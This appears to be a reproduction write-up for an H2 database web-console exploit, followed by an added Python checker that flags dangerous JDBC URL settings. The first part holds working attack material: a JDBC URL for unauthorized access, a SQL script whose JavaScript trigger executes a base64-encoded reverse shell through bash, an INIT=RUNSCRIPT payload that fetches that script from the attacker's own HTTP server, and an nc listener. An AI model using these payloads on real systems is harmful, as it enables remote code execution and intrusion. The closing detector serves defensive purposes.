Start the environment:
Access the H2 web console.
Unauthorized access PoC (JDBC URL entered in the console login form):
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\
RCE via a reverse shell
- Create the SQL script file h2database.sql:
CREATE TABLE test ( id INT NOT NULL ); CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript Java.type("java.lang.Runtime").getRuntime().exec("bash -c {echo,<base64-encoded reverse shell command>}|{base64,-d}|{bash,-i}");';
- Start a Python HTTP server in the directory holding h2database.sql:
python3 -m http.server <port>
- Enter the payload as the JDBC URL; INIT=RUNSCRIPT makes H2 fetch and execute the script when the connection is opened:
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://<your IP>:<port>/h2database.sql';\
- Listen for the reverse shell:
nc -lvvp xxxx
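As an added defensive example (not part of the original write-up): a small Python checker that parses an H2 JDBC URL of the kind shown above and reports the settings that make it dangerous, namely FORBID_CREATION=FALSE, IGNORE_UNKNOWN_SETTINGS=TRUE, and an INIT=RUNSCRIPT FROM a remote URL. The sample URLs in the test, including the 192.0.2.10 address, are constructed; the parser assumes settings are separated by plain semicolons with no escaped ';' inside values.

```python
import re

# Settings whose presence in a user-supplied H2 JDBC URL is a red flag.
# The names are H2's own; the values are the ones used in the payloads above.
RISKY_SETTINGS = {
    "FORBID_CREATION": "FALSE",         # lets the console create arbitrary databases
    "IGNORE_UNKNOWN_SETTINGS": "TRUE",  # suppresses errors for smuggled/typo'd settings
}
# INIT=RUNSCRIPT FROM '<source>' runs SQL at connect time; a network source means
# the script (and any JavaScript trigger inside it) comes from an outside host.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_h2_url(url: str):
    """Split 'jdbc:h2:<db>;K=V;K=V' into (db, [(KEY, value), ...]).
    Keys are upper-cased because H2 treats them case-insensitively.
    Assumption: no escaped ';' inside values."""
    if not url.lower().startswith("jdbc:h2:"):
        raise ValueError("not an H2 JDBC URL")
    body = url[len("jdbc:h2:"):].rstrip("\\")  # drop the trailing '\' seen in the PoC
    parts = body.split(";")
    settings = []
    for part in parts[1:]:
        if "=" in part:
            key, value = part.split("=", 1)
            settings.append((key.strip().upper(), value.strip()))
    return parts[0], settings


def assess_h2_url(url: str):
    """Return a de-duplicated list of findings for a JDBC URL submitted to the console."""
    db, settings = parse_h2_url(url)
    findings = []

    def add(msg):
        if msg not in findings:
            findings.append(msg)

    if db.lower().startswith("mem:"):
        add("in-memory database: needs no file on disk, typical of a throwaway session")
    for key, value in settings:
        if RISKY_SETTINGS.get(key) == value.upper():
            add(f"{key}={value.upper()}")
        if key == "INIT":
            m = re.search(r"RUNSCRIPT\s+FROM\s+'([^']*)'", value, re.IGNORECASE)
            if m and m.group(1).lower().startswith(REMOTE_SCHEMES):
                add(f"INIT runs a remote script: {m.group(1)}")
            elif m:
                add(f"INIT runs a local script: {m.group(1)}")
            else:
                add("INIT executes SQL at connect time")
    return findings
```

A check like this fits in a reverse proxy rule or a review of console login attempts; any non-empty result on a URL not coming from an administrator is worth an alert.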